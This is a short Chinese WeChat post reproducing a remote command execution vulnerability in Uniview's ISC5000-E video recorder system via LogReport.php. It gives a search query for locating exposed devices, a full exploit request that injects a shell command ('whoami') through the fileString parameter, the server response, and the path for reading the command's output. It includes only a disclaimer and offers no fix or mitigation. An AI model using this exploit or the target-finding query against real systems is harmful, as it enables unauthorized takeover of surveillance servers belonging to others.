声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
漏洞描述
浙江宇视科技有限公司(宇视uniview 创业于2011年,宇视是一家全球公共安全和智能交通的解决方案提供商,以可视、智慧、物联产品技术为核心的引领者。浙江宇视科技 网络视频录像机系统存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限.
资产收集
web.title=="ISC5000-E"
漏洞复现
构造请求包
GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x%3bwhoami%3e1.txt HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip, deflate
返回包
HTTP/1.1 200 OKDate: Tue, 12 Dec 2023 01:58:12 GMTServer: UnisvrSet-Cookie: PHPSESSID=17eb6cc014818cbef45acae344db3914; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=utf-8Content-Length: 50
请求完毕,访问路径
http://ip:port/Interface/LogReport/1.txt
原文始发于微信公众号(Devil安全):【漏洞复现】浙江宇视 isc LogReport.php 远程命令执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论